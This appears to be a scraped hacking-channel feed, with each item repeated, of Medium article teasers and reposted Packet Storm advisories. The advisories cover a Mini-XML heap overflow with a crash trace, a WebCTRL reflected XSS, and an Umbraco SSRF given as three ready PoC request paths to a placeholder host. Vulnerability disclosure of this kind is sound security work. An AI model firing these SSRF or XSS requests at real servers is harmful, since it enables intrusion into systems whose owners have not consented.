Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
CONFIGURAÇÃO DO AMBIENTE E INTERCEPTAÇÃO DE TRÁFEGO. 3
https://cdn-images-1.medium.com/max/1920/1*uvfSJ_7D4vj7lCG-Kmom4w.png
Você vai economizar muito tempo e dor de cabeça se procurar Falhas em um local bem configurado, como um laboratório. Neste Texto, vou…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
CONFIGURAÇÃO DO AMBIENTE E INTERCEPTAÇÃO DE TRÁFEGO. 3
https://cdn-images-1.medium.com/max/1920/1*uvfSJ_7D4vj7lCG-Kmom4w.png
Você vai economizar muito tempo e dor de cabeça se procurar Falhas em um local bem configurado, como um laboratório. Neste Texto, vou…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CONFIGURAÇÃO DO AMBIENTE E INTERCEPTAÇÃO DE TRÁFEGO. 3
Você vai economizar muito tempo e dor de cabeça se procurar Falhas em um local bem configurado, como laboratório. Neste Texto, vou…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Getting Started With Cyber Security & Ethical Hacking
https://cdn-images-1.medium.com/max/1920/0*qIQWwsLSL2-pE5Hd
Why Cybersecurity? In the current scenario, where everything has shifted to internet, so is the crime that has also upgraded…..
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Getting Started With Cyber Security & Ethical Hacking
https://cdn-images-1.medium.com/max/1920/0*qIQWwsLSL2-pE5Hd
Why Cybersecurity? In the current scenario, where everything has shifted to internet, so is the crime that has also upgraded…..
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Getting Started With Cyber Security & Ethical Hacking
Why Cybersecurity? In the current scenario, where everything has shifted to internet, so is the crime that has also upgraded…..
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Footprinting and Reconnaissance
https://cdn-images-1.medium.com/max/1920/0*7T_YjdSnACBdSu-9
Footprinting is the first step a hacker does before hacking. In this step the hacker tries to gain information regarding the victim or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Footprinting and Reconnaissance
https://cdn-images-1.medium.com/max/1920/0*7T_YjdSnACBdSu-9
Footprinting is the first step a hacker does before hacking. In this step the hacker tries to gain information regarding the victim or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Footprinting and Reconnaissance
Footprinting is the first step a hacker does before hacking. In this step the hacker tries to gain information regarding the victim or…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How I was able to access a properly Configured S3 Bucket
https://cdn-images-1.medium.com/max/600/1*6bWo-VdVMac1FtUOkMCI-w.png
Hello All
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How I was able to access a properly Configured S3 Bucket
https://cdn-images-1.medium.com/max/600/1*6bWo-VdVMac1FtUOkMCI-w.png
Hello All
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I was able to access a properly Configured S3 Bucket
Hello All
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Footprinting and Reconnaissance using Windows OS
https://cdn-images-1.medium.com/max/1920/0*4yXf6NHSJJQVbiwT
This blog is in continuation previous blog on footprinting and reconnaissance. Previously you understood how to do footprinting with the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Footprinting and Reconnaissance using Windows OS
https://cdn-images-1.medium.com/max/1920/0*4yXf6NHSJJQVbiwT
This blog is in continuation previous blog on footprinting and reconnaissance. Previously you understood how to do footprinting with the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Footprinting and Reconnaissance using Windows OS
This blog is in continuation previous blog on footprinting and reconnaissance. Previously you understood how to do footprinting with the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Este nuevo malware de Android puede obtener acceso de root a sus teléfonos inteligentes
https://cdn-images-1.medium.com/max/1449/0*XeU63rTCr2bmzTk-
PUBLICADO EN 29 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Este nuevo malware de Android puede obtener acceso de root a sus teléfonos inteligentes
https://cdn-images-1.medium.com/max/1449/0*XeU63rTCr2bmzTk-
PUBLICADO EN 29 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Este nuevo malware de Android puede obtener acceso de root a sus teléfonos inteligentes
PUBLICADO EN 29 OCTUBRE, 2021POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack This Site: Extended Basic — Mission 2
https://cdn-images-1.medium.com/max/2048/1*DMynhh_14Bj3h-4jzFy6-w.png
Hello friend and welcome to HaXeZ where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple…
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Hack This Site: Extended Basic — Mission 2
https://cdn-images-1.medium.com/max/2048/1*DMynhh_14Bj3h-4jzFy6-w.png
Hello friend and welcome to HaXeZ where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple…
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hack This Site: Extended Basic — Mission 2
Hello friend and welcome to HaXeZ where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mini-XML 3.2 Heap Overflow
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Mini-XML version 3.2 suffers from a heap overflow vulnerability.
MD5 |
Download
# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2
# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.
=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
# 6.- Here are my testcase.
#include
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mini-XML 3.2 Heap Overflow
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Mini-XML version 3.2 suffers from a heap overflow vulnerability.
MD5 |
e0337ff754d4ab2bcf03b81e9a3f4a1eDownload
# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2
# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.
=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
# 6.- Here are my testcase.
#include
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mini-XML 3.2 Heap Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WebCTRL OEM 6.5 Cross Site Scripting
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
WebCTRL OEM version 6.5 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WebCTRL OEM 6.5 Cross Site Scripting
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
WebCTRL OEM version 6.5 suffers from a cross site scripting vulnerability.
MD5 |
ac56809d778f5779efeadfa3fa8e7c1dDownload
# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
# Date: 4/07/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
# Version: 6.5 and Below
# CVE : CVE-2021-31682
--Summary--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized.
Automated Logic
https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
--Affects--
- WebCTRL OEM
- Versions 6.5 and prior
--Details--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:
- Hijacking a user's session
- Using XSS payloads to capture input (keylogging)
-- Proof of Concept --
The following URL parameter was impacted and can be exploited with the sample payload provided below:
- https://example.com/index.jsp?operatorlocale=en/>
--Mitigation--
Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
--Timeline--
- 4/07/2021: XSS Vulnerability was discovered and documented.
- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WebCTRL OEM 6.5 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Umbraco 8.14.1 Server-Side Request Forgery
https://2.bp.blogspot.com/-uXp9StI5Rh0/WWlvYIMdqaI/AAAAAAAAIOg/mHe50EJovPcz8di_9Up4vC4YPRAZ9BUbwCLcBGAs/s1600/h55.png
Umbraco version 8.14.1 suffers from a server-side request forgery vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Umbraco 8.14.1 Server-Side Request Forgery
https://2.bp.blogspot.com/-uXp9StI5Rh0/WWlvYIMdqaI/AAAAAAAAIOg/mHe50EJovPcz8di_9Up4vC4YPRAZ9BUbwCLcBGAs/s1600/h55.png
Umbraco version 8.14.1 suffers from a server-side request forgery vulnerability.
MD5 |
56c7bdf5153af0c96a659fa68f9059d1Download
# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud
Vulnerable code:
Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
PoC:
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
Notes:
- There's no "/" suffix in payload 1
- "/" suffix is required in payload 2 and payload 3
- "section" parameter value must be changed each exploit attempt
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Umbraco 8.14.1 Server-Side Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.